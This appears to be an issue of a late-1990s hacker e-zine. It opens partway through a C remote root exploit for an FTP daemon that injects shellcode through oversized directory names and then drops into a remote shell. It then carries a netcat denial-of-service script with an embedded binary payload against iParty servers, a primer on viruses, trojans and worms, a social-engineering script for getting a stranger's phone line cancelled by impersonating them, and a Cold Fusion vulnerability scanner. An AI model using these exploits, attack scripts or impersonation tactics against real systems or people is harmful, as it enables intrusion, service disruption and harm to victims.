{ 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", },
{ 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", },
{ 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", },
{ 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", },
{ 0,0,0,0,NULL }
};
struct options {
char start_dir[20];
unsigned char *shellcode;
unsigned char chroot;
char username[10];
char password[10];
int offset;
int t;
} opts;
/* Bit of a big messy function, but hey, its only an exploit */
int main(int argc,char **argv)
{
char *argv0,ltr;
char outbuf[1024], inbuf[1024], ret_string[5];
int pwdlen,ctr,d;
FILE *cin;
int fd;
struct in_addr victim;
argv0 = strdup(argv[0]);
*opts.username = *opts.password = *opts.start_dir = 0;
opts.chroot = opts.offset = opts.t = 0;
opts.shellcode = hellcode_a;
while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
switch (d) {
case 'c':
opts.shellcode = hellcode_b;
opts.chroot = 1;
break;
case 's':
strcpy(opts.start_dir,optarg);
break;
case 'o':
opts.offset = atoi(optarg);
break;
case 't':
opts.t = atoi(optarg);
if ((opts.t < 0)||(opts.t>5)) {
printf("Dont have that type!\n");
exit(-1);
}
}
}
argc -= optind;
argv += optind;
if (argc < 3)
usage(argv0);
if (!resolv(argv[0],&victim)) {
perror("resolving");
exit(-1);
}
strcpy(opts.username,argv[1]);
strcpy(opts.password,argv[2]);
if ((fd = tcp_connect(victim,21)) < 0) {
perror("connect");
exit(-1);
}
if (!(cin = fdopen(fd,"r"))) {
printf("Couldn't get stream\n");
exit(-1);
}
Fgets(inbuf,sizeof(inbuf),cin);
printf("%s",inbuf);
if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
fatal("Bad username\n");
if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
fatal("Bad password\n");
if (*opts.start_dir)
if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
fatal("Couldn't change dir\n");
if (ftp_command(inbuf,257,cin,"PWD\n")<0)
fatal("PWD\n");
if (parse_pwd(inbuf,&pwdlen) < 0)
fatal("PWD\n");
srand(time(NULL));
printf("Making padding directorys\n");
for (ctr = 0;ctr < 4;ctr++) {
ltr = rand()%26 + 65;
memset(outbuf,ltr,194);
outbuf[194]=0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
}
/* Make padding directory */
ctr = 124 - (pwdlen - types[opts.t].align);//180
//ctr = 152 - (pwdlen - types[opts.t].align);
ctr -= types[opts.t].pad_shift;
if (ctr < 0) {
exit(-1);
}
memset(outbuf,'A',ctr+1);
outbuf[ctr] = 0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
memset(outbuf,0x90,195);
d=0;
for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++)
outbuf[ctr] = opts.shellcode[d++];
double_up(types[opts.t].ret_address-opts.offset,ret_string);
strcpy(outbuf+RET_POS,ret_string);
strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);
printf("Press any key to send shellcode...\n");
getchar();
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (types[opts.t].overflow_type == 1)
if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
fatal("DELE\n");
/* HEH. For type 1 style we add a dele command. This overflow
occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
not checking bounds correctly, overwriting path[] in delete(). */
RunShell(fd);
return(1);
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
return;
}
int double_up(unsigned long blah, char *doh)
{
int a;
unsigned char *ptr,*ptr2;
bzero(doh,6);
ptr=doh;
ptr2=(char *)&blah;
for (a=0;a<4;a++) {
*ptr++=*ptr2;
if (*ptr2==0xff) *ptr++=0xff;
ptr2++;
}
return(1);
}
int parse_pwd(char *in, int *pwdlen)
{
char *ptr1,*ptr2;
/* 257 "/" is current directory */
ptr1 = strchr(in,'\"');
if (!ptr1) return(-1);
ptr2 = strchr(ptr1+1,'\"');
if (!ptr2) return(-1);
*ptr2 = 0;
*pwdlen = strlen(ptr1+1);
/* If its just "/" then it contributes nothing to the RET_POS */
if (*pwdlen==1) *pwdlen -= 1;
printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
return(1);
}
int tcp_connect(struct in_addr host,unsigned short port)
{
struct sockaddr_in serv;
int fd;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
serv.sin_port = htons(port);
serv.sin_family = AF_INET;
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
return(-1);
}
return(fd);
}
int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
va_list va;
char line[1200];
int val;
va_start(va,fmt);
vsprintf(line,fmt,va);
va_end(va);
if (write(fileno(out),line,strlen(line)) < 0)
return(-1);
bzero(buf,200);
while(1) {
Fgets(line,sizeof(line),out);
#ifdef DEBUG
printf("%s",line);
#endif
if (*(line+3)!='-') break;
}
strncpy(buf,line,200);
val = atoi(line);
if (success != val) return(-1);
return(1);
}
void fatal(char *string)
{
printf("%s",string);
exit(-1);
}
char *Fgets(char *s,int size,FILE *stream)
{
char *ptr;
ptr = fgets(s,size,stream);
//if (!ptr)
//fatal("Disconnected\n");
return(ptr);
}
int resolv(char *hostname,struct in_addr *addr)
{
struct hostent *res;
if (inet_aton(hostname,addr))
return(1);
res = gethostbyname(hostname);
if (res == NULL)
return(0);
memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
return(1);
}
int usage(char *program)
{
fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program);
fprintf(stderr,"\t[-o offset] [-t type]\n");
fprintf(stderr,"types:\n");
fprintf(stderr,"0 - %s\n", types[0].name);
fprintf(stderr,"1 - %s\n", types[1].name);
fprintf(stderr,"2 - %s\n", types[2].name);
fprintf(stderr,"3 - %s\n", types[3].name);
fprintf(stderr,"4 - %s\n", types[4].name);
fprintf(stderr,"5 - %s\n", types[5].name);
fprintf(stderr,"\n");
exit(0);
}
/* -EOF- */
------------------------------
1.06 --=\\ippooper\\=--
#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortunately, the daemon, that's included in the iParty download, can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.
if [ "$1" = "" ]; then
echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
echo "Maybe you'll get lucky."
echo ""
echo "Usage: $0 <hostname/ip> <port>"
echo "Port is probably 6004 (default port)."
echo ""
echo "Remember: You need netcat for this program to work."
echo "If you see something similar to 'nc: command not found', get netcat."
else
if [ "$2" = "" ]; then
echo "I said the port is probably 6004, try that."
exit
else
rm -f ipp00p
cat > ipp00p << _EOF_
$6ì]}tTÕµ?"Ìap/HÔD0iAá1/2L%ÏÌEBEÔð'*}ÒyÓÔ¥(3êznÃuèÔj+¨°(Ö-Öd'(tm)øZiXåËy7
¡'``à3/41/2Ï Cµ¶ïüÖʹçî³ÏÞçì1/2Ï>çÜE¢6â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=o¨§
8ÂÓ'L5"ï鲱ᤸDRGÒIôlqYg»ÒiÆiÕ3/4ëH¹Hwòá1/2²»Ô3ðl*oÎ#ésC9m,
_EOF_
echo ""
echo "Sending kill..."
cat ipp00p | nc $1 $2
echo "Done."
rm -f ipp00p
fi
fi
------------------------------
--=\\2.00\\=--
2.01 --=\\Understanding a computer virus\\=--
INTRODUCTION
"Information wants to be free!"
In the last few years, much has been said, and many text files written, about computer
viruses. Many rumors, but few straight facts, have made people aware of
possible problems but have not shown an effective way to deal with them. Today most
computer users know of computer viruses, but few know how, or bother, to take even
the most basic precautions against them. The majority of all virus infections, and
the subsequent destroyed data, could be prevented by a few easy steps. Unfortunately,
people with the right kind of insight have long considered it a good policy not to
share their knowledge with outsiders. For fear that some people would misuse this
information to create more malicious viruses, it has generally been frowned upon to
write a text in this area. Obviously this "protection by ignorance" has done no
good. Its failure can be seen in the thousands of viruses already in existence, and
the new ones constantly appearing. Virus programmers have had no problems obtaining
the information they need to program viruses, but other computer users seeking
information on how to protect themselves have been left in the dark. How can anybody
protect themselves from what they do not understand? The idea of dangerous,
forbidden knowledge has always been particularly distasteful to me. Trying to keep
information from people, besides being impossible, has never led to any good.
Information needs to be free!
Definition
"Don't buy a computer"
Before going any further in the virus discussion, we need to get a few things clear.
What exactly is a computer virus? How does a computer virus differentiate itself
from other damaging programs and from other "normal" programs? There has been some
confusion on what viruses actually are and what they are not. Often the designation
"computer virus" is used simply to denote any destructive program. This, strictly
speaking, is not correct. In this text I will try to reach a clear definition of
"computer virus" and other computer mischief programs. There are basically three
different kinds of these programs: viruses, Trojan horses, and worms. Generally, it
can be said that these programs gain access to places and/or perform actions not
intended by the user, often damaging data in the process. However, the exact phrases
often get misused and mixed. That is not surprising, considering the difficulty even
experienced computer users can have in obtaining the "hard" technical information
needed to understand the concepts involved. Furthermore, methods that can
successfully defend you against one type may have no effect against another. It is
important to know what these "rogue" programs do, if you are to defend yourself
against them.
Virus
The first computer virus for a personal computer was discovered (and created) around
1980. That means we've had about 15 years to get acquainted with them and used to
their presence. Computer viruses are not a short-lived curiosity; they are here today and
will continue to be here for as long as anyone can foresee. They are sufficiently
widespread to be a real danger to most computers, requiring people using computers
to have at least a basic knowledge of their workings if they want to avoid
infections. And even though the term "computer virus" is well known even among
people with little computer experience, what a computer virus actually signifies
remains a mystery to most people. This, at least, is no mystery, since there is
disagreement on what a computer virus is, and what it's not, even among people
specialized in the computer virus field. There is no general, agreed-upon
definition. Still, let's look at some of the basic requirements that must be true
before a program can be called a virus.
First, like a biological virus, a computer virus exists to replicate; if it
cannot replicate, it's not a virus. A biological virus replicates to spread its
DNA. A computer virus can replicate to spread its program code. Just as a biological
virus changes the cells' own DNA to force them to make new viruses, a computer
virus modifies the code in the programs it targets to make new computer viruses.
The term "computer virus" was coined by Fred Cohen in the first paper discussing
the theoretical aspects of computer virus programs. His thesis was published as
early as 1984, in the days when a virus was still an interesting novelty. However,
perhaps because it appeared before many viruses existed, his definition covers only
viruses that propagate by attaching themselves directly to other programs. This is a
bit narrow for today's use and does not cover many of the programs that today we call
viruses, namely those that propagate by attaching themselves to floppy/hard disks
instead of specific programs (partition/boot infectors). If we just broaden Cohen's
definition to include those disk-infecting viruses, we can cover all the different
virus types in existence today and still have a small group with common characteristics.
1. A virus is a self-replicating program whose main (only) purpose is to propagate
itself to as many different places as possible.
2. A virus propagates itself by modifying another program to include itself.
3. (This is the crux) A virus can only propagate itself by an (unknowing) act of a
user of the system in which it exists.
A small note on the plural: "virus" is Latin, meaning poison. In Latin it is a "mass"
word, like water and air in English, and as such has no Latin plural. Its correct
English plural is viruses, though often others are seen, like viri and virii.
Trojan Horse
Trojan horses are simply programs that feign, by their name or their documentation,
to do one thing, when in fact they do something else entirely, often something
very destructive. Trojan horses are not very common and (contrary to viruses) are
found mostly on "Computer Bulletin Boards". Trojans' spreading potential is not very
big, because once they are run they give themselves away (cease to be Trojans),
and the only way for a trojan to propagate itself would be for a user to copy it to
somewhere else. Besides the author, few people would knowingly spread them (or any
other destructive program, for that matter). A typical trojan horse could simply be
a program given the name of another known program, which would be tempting for an
unsuspecting user to start. A number of Trojans pretending to be anti-virus or
anti-Trojan software have been circulated. The name "Trojan horse" came from the
wooden horse the ancient Greek army used to conquer the city of Troy and save the
beautiful Helen.
Worm
A worm can be defined as a program propagating itself in a network of computers,
using bugs, which are unforeseen (by the designers and users) side effects of the
operating system, or breaking (guessing) passwords to gain access to other machines
in the network. Contrary to viruses, no user interaction is needed for the worm to
spread. Worms need no host program to propagate; viruses are parasitic, worms are
not. Periodically, rumors surface of worms existing in a DOS environment, using a
modem to propagate themselves. However, that is just a rumor. No worm has ever
spread using a modem as a channel. Even though it is possible to make a worm for a
DOS system spreading itself in a network of PCs, few have been spotted, mainly
because of the limited size of such networks. Today there are only a few computer
networks with sufficient size to enable a worm to be anything but a local menace:
the internet. There have been two major outbreaks of worms on the internet, the
not-so-famous Christmas Exec mail worm of 1987 and the very famous (infamous) Morris
internet worm of 1988.
Written by, EazyMoney
eazy_money@Cyber-Strike.com
------------------------------
2.02 --=\\Dropping Phonelines\\=--
This is one of the best thangs I ever figured out and it is easy as 1,2,3. I wrote
this for educational use only!! If you fuck up and get busted it is not my ass it
is yours. Here we go you phone addicts:
-Step 1.
Go to a COCOT (Customer Owned Coin Operated Telephone). Now dial up a PBX
(Private Branch Exchange). All you got to do now is dial up the phone company.
-Step 2.
Call the operator and tell him/her you would like to cancel your account with the
service.
Here is how it will probably go:
--
(operator) (phone company name and his/her name) how may I help you?
(you) I would like to cancel my account with your service.
(operator) What is your name sir/madam and your area code-prefix-number?
(you) Blah blah (the lamer's name that is listed in the phone book)
(operator) Mr.blah/Ms.blah we need your account and access number to go any
further.
(you) What is what?
(operator) It is the digits on top of your last phone bill.
(you) See that is why I want to cancel my account, reason being I don't
ever get the bill or any thang of that type and at&t/sprint/mci has a
lot better deal than you guys have.
(operator) Sorry Mr.blah/Ms.blah I can't cancel your phone line without the
account and access number.
(you) Well it is not my fault that I don't ever get the bill from your
company and it is your fault.
(operator) I am sorry you feel this way, here is what you can do, come in to our
office on(blah)
(you) Look I am not like other people I can't get out of the house I got
this disorder and I can't have anyone to go there just cancel the
number please this will save us both time.
(operator) Please hold Mr.blah/Ms.blah
(you) ok
(operator) Your phone number has now been canceled thank you for using our service.
(you) Yea ok bye
--
-Step 3.
Hang the phone up and get the fuck out of the area. If on foot and you see the
pigs don't fucking freak out. Same if you are driving. All pigs are gay and dumb
so chill.
EazyMoney
eazy_money@Cyber-Strike.com
------------------------------
2.03 --=\\Cold Fusion Scanner\\=--
/* Usage:
$ gcc -o cfscan cfscan.c -w (hey i don't want my warnings shown :P)
$ ./cfscan www.antionline.com > tinylog.txt
$ echo PBBSER 0wns me
Greets:
Groups: Phukt Security, The LegionOOT, Team Spl0it, & gH
Channels (various servers): #hacktech, #hyperlink, #3xposure, #c,
#./hack, #ek & #phukt
People: Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t, F-o-X,
NeonMatrix, Azmodan, v0rt-fu, Tainted Angel, cpu, tw1ster,
ultr4k- the intellimouse hax0r, ... the list goes on
and on...
*/
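#include <stdio.h>
#include <stdlib.h> /* exit(), system() */
#include <string.h>
#include <strings.h> /* bcopy() */
#include <unistd.h> /* close() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>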
int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in host;
struct hostent *he;
int port = 80;
char *gets[4];
char getbuff[1000];
char *check;
gets[1] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
gets[2] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
gets[3] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
system("clear");
printf("\t\tCold Fusion Vulnerability Scanner\n");
printf("\t\tBy PBBSER -- Phukt Security Coming At You\n");
if (argc != 2)
{
printf("\nUsage: %s [host]\n", argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
perror("getting hostname");
exit(0);
}
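sockfd=socket(AF_INET, SOCK_STREAM, 0);
memset(&host, 0, sizeof(host)); /* clear the padding bytes before use */
bcopy(he->h_addr, (char *)&host.sin_addr, he->h_length);
host.sin_family=AF_INET;
host.sin_port=htons(port);
if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0)
{
perror("connect");
exit(1); /* nothing to check without a connection */
}
printf("connected\n");
send(sockfd, gets[1],strlen(gets[1]),0);
memset(getbuff, 0, sizeof(getbuff)); /* keep the reply NUL-terminated for strstr */
recv(sockfd, getbuff, sizeof(getbuff)-1,0);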
check = strstr(getbuff,"200");
if(check != NULL)
{
printf("openfile.cfm found\n");
}
else
{
printf("openfile.cfm wasn't found, so we are gunna exit\n");
close(sockfd);
exit(0);
}
close(sockfd);
sockfd=socket(AF_INET, SOCK_STREAM, 0);
host.sin_family=AF_INET;
host.sin_port=htons(port);
if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0)
{
perror("connect");
exit(1);
}
send(sockfd, gets[2],strlen(gets[2]),0);
memset(getbuff, 0, sizeof(getbuff)); /* keep the reply NUL-terminated for strstr */
recv(sockfd, getbuff, sizeof(getbuff)-1,0);
check = strstr(getbuff,"200");
if(check != NULL)
{
printf("exprcalc.cfm found\n");
}
close(sockfd);
sockfd=socket(AF_INET, SOCK_STREAM, 0);
host.sin_family=AF_INET;
host.sin_port=htons(port);
if (connect(sockfd, (struct sockaddr*)&host, sizeof(host)) < 0)
{
perror("connect");
exit(1);
}
send(sockfd, gets[3],strlen(gets[3]),0);
memset(getbuff, 0, sizeof(getbuff)); /* keep the reply NUL-terminated for strstr */
recv(sockfd, getbuff, sizeof(getbuff)-1,0);
check = strstr(getbuff,"200");
if(check != NULL)
{
printf("displayopenedfile.cfm found\n");
}
close(sockfd);
printf("\nWe're done. Word.\n");
}
PBBSER
pbbser@legionoot.hypermart.net
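For the server side of the scanner above: an added example (not part of the original issue, and not PBBSER's code) that flags web access-log lines requesting anything under the /cfdocs/expelval/ directory the scanner probes. It assumes Common Log Format; the log lines and addresses are constructed samples, and is_cf_probe and normalize are names chosen here.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Directory the scanner above requests files from (taken from the page). */
static const char *PROBE_DIR = "/cfdocs/expelval/";
/* Constructed sample access-log lines in Common Log Format (not real traffic). */
static const char *SAMPLE[] = {
    "192.0.2.10 - - [10/May/1999:10:00:01 +0000] \"GET /index.html HTTP/1.0\" 200 1043",
    "192.0.2.77 - - [10/May/1999:10:00:05 +0000] \"GET /cfdocs/expelval/openfile.cfm HTTP/1.0\" 200 2311",
    "192.0.2.77 - - [10/May/1999:10:00:05 +0000] \"GET /CFDOCS/expelval/exprcalc.cfm HTTP/1.0\" 200 1800",
    "192.0.2.77 - - [10/May/1999:10:00:06 +0000] \"GET /cfdocs/%65xpelval/displayopenedfile.cfm?x=1 HTTP/1.0\" 404 210",
    "192.0.2.10 - - [10/May/1999:10:00:09 +0000] \"GET /docs/cfdocs/expelval.html HTTP/1.0\" 200 99",
};

/* Decode %XX escapes and lower-case, so case or encoding variants still match. */
static void normalize(const char *in, size_t len, char *out, size_t outsz)
{
    size_t o = 0;
    for (size_t i = 0; i < len && o + 1 < outsz; i++) {
        unsigned int c = (unsigned char)in[i];
        if (c == '%' && i + 2 < len && isxdigit((unsigned char)in[i + 1]) &&
            isxdigit((unsigned char)in[i + 2]) && sscanf(in + i + 1, "%2x", &c) == 1)
            i += 2; /* skip the two hex digits just decoded into c */
        out[o++] = (char)tolower((int)c);
    }
    out[o] = '\0';
}

/* Return 1 if the request path in a log line lies under PROBE_DIR, else 0. */
int is_cf_probe(const char *line)
{
    char path[512];
    const char *req = strchr(line, '"');                /* opening quote of the request */
    const char *sp = req ? strchr(req + 1, ' ') : NULL; /* space after the method */
    if (!sp) return 0;
    size_t len = strcspn(sp + 1, " ?\"");               /* path ends at space, query or quote */
    normalize(sp + 1, len, path, sizeof(path));
    return strncmp(path, PROBE_DIR, strlen(PROBE_DIR)) == 0;
}

int main(void)
{
    for (size_t i = 0; i < sizeof(SAMPLE) / sizeof(SAMPLE[0]); i++)
        if (is_cf_probe(SAMPLE[i])) printf("PROBE: %s\n", SAMPLE[i]);
    return 0;
}
```

A hit with status 200 means the sample application is installed and reachable on that server; a hit with 404 still records that someone was looking for it.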
------------------------------
Please visit:
http://www.websponsors.com/cgi-bin/ad_click.cgi?userid=8189&offerid=242
to help us pay the bills. Please take two seconds out of your time and go there.
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art is done by Lord Oak and permission is needed from him before using.